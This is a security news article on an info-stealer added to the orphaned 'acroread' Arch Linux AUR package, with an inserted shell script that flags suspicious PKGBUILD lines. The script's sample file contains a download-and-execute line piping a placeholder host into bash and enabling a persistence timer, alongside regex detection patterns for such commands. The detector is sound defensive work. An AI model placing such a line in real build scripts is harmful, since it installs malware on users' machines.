Malware Found in Arch Linux AUR Package Repository

Info-stealer found in “acroread” Arch Linux package

The incident was possible because the AUR lets any registered user adopt “orphaned” packages, ones whose original maintainers have disowned or abandoned them.

On Saturday, a user going by the pseudonym “xeactor” adopted one such orphaned package, “acroread”, which provides a PDF viewer for Arch Linux users.

According to the Git commit in the package’s AUR repository, xeactor added code to the package’s build script that downloaded a file named “~x” from ptpb.pw, a lightweight Pastebin-like site for sharing small pieces of text.

When a user built and installed the modified package, their machine downloaded and executed ~x [VirusTotal, source code], which in turn downloaded and ran a second file named “~u” [VirusTotal, source code].

Besides fetching ~u, the first file’s main job was persistence: ~x installed a systemd timer that re-ran ~u every 360 seconds.
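The behaviour described above is why the AUR is only as safe as the PKGBUILD you build from: makepkg runs the build script’s functions as ordinary shell on your own machine, so a malicious maintainer needs nothing more than one extra line. The following script is an added example, not code from the article, the AUR or makepkg. It flags the two patterns the article describes (a download-and-execute during packaging and a systemd timer installed from the build script) and can be pointed at only the lines a new revision adds, which is the check to run when a package has just changed hands. The package name examplepdf, the host paste.example and both sample PKGBUILDs are constructed placeholders, not the actual acroread commit.

```shell
#!/bin/sh
# Added example, not code from the article, the AUR or makepkg. It audits a
# PKGBUILD for the two behaviours the article describes: fetching and running
# remote content while the package is built, and installing a systemd timer.
# The regexes and the sample PKGBUILDs below are constructed for this example.

# Print "[category] lineno:text" for every line of $3 matching the ERE $2.
run_check() {
    grep -nE "$2" "$3" | sed "s/^/[$1] /"
}

# Audit one PKGBUILD: print the findings and return 1 if there are any,
# 0 if the file is clean. A line may be reported under several categories.
audit_pkgbuild() {
    local file report
    file="$1"
    report="$(
        # curl/wget output piped into a shell, or a shell fed by <(curl ...)
        run_check remote-exec '(curl|wget)[^|]*[|][[:space:]]*(ba|z|da)?sh([[:space:]]|$)' "$file"
        run_check remote-exec '(ba|z)?sh[[:space:]]+<[(](curl|wget)' "$file"
        # any direct download inside a function: makepkg fetches source=() itself,
        # so ad hoc network access at build or package time is rarely legitimate
        run_check network '^[[:space:]]*(curl|wget)[[:space:]]' "$file"
        # systemd units or timers enabled or written by the build script
        run_check systemd 'systemctl[[:space:]]+(--user[[:space:]]+)?(enable|start)|[.]timer([[:space:]]|$)|OnUnitActiveSec|OnCalendar' "$file"
    )"
    [ -n "$report" ] || return 0
    printf '%s\n' "$report"
    return 1
}

# Audit only the lines a new revision adds to an old one: the check to run
# when a package has just changed hands. In diff's normal output the added
# lines carry a "> " prefix; the reported line numbers refer to that excerpt.
audit_added_lines() {
    local old new added status
    old="$1" new="$2"
    added="$(mktemp)"
    diff "$old" "$new" | sed -n 's/^> //p' > "$added"
    if audit_pkgbuild "$added"; then status=0; else status=1; fi
    rm -f "$added"
    return "$status"
}

# Constructed fixtures: a hypothetical package "examplepdf", then the same
# file after a hostile new maintainer has edited it. These are placeholders,
# not the real acroread files; paste.example is a placeholder host.
write_sample_pkgbuilds() {
    local dir
    dir="$1"
    cat > "$dir/PKGBUILD.clean" <<'EOF'
pkgname=examplepdf
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://downloads.example/examplepdf-$pkgver.tar.gz")
sha256sums=('SKIP')

package() {
    cd "$srcdir/examplepdf-$pkgver"
    install -Dm755 examplepdf "$pkgdir/usr/bin/examplepdf"
}
EOF
    cat > "$dir/PKGBUILD.modified" <<'EOF'
pkgname=examplepdf
pkgver=1.0
pkgrel=2
arch=('x86_64')
source=("https://downloads.example/examplepdf-$pkgver.tar.gz")
sha256sums=('SKIP')

package() {
    cd "$srcdir/examplepdf-$pkgver"
    install -Dm755 examplepdf "$pkgdir/usr/bin/examplepdf"
    curl -s https://paste.example/~x | bash &
    systemctl enable --now examplepdf-update.timer
}
EOF
}

# Demo: audit both revisions, then only what the new revision added.
demo_dir="$(mktemp -d)"
write_sample_pkgbuilds "$demo_dir"
echo "== clean revision"
audit_pkgbuild "$demo_dir/PKGBUILD.clean" && echo "no findings"
echo "== modified revision"
audit_pkgbuild "$demo_dir/PKGBUILD.modified" || echo "=> do not build this"
echo "== lines added by the new revision"
audit_added_lines "$demo_dir/PKGBUILD.clean" "$demo_dir/PKGBUILD.modified" || echo "=> do not build this"
rm -rf "$demo_dir"
```

Treat a hit as a reason to read the whole PKGBUILD, not as proof of malice, and treat a clean run as no more than that: string matching is defeated by trivial obfuscation (base64, split variables, a loader hidden in a file the package already ships), so the authoritative check after an orphan adoption remains reading the full diff in the package’s AUR git log before building.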

The AUR team said it found similar code in two other packages xeactor had recently adopted, but did not name them.

Arch Linux is the second distribution this year to find malware in a user-submitted package repository. In May, the Ubuntu Snap Store team found a cryptocurrency miner hidden in a snap package named 2048buntu.

The malicious code has been removed thanks to the quick intervention of the AUR team.

Source: Bleeping Computer
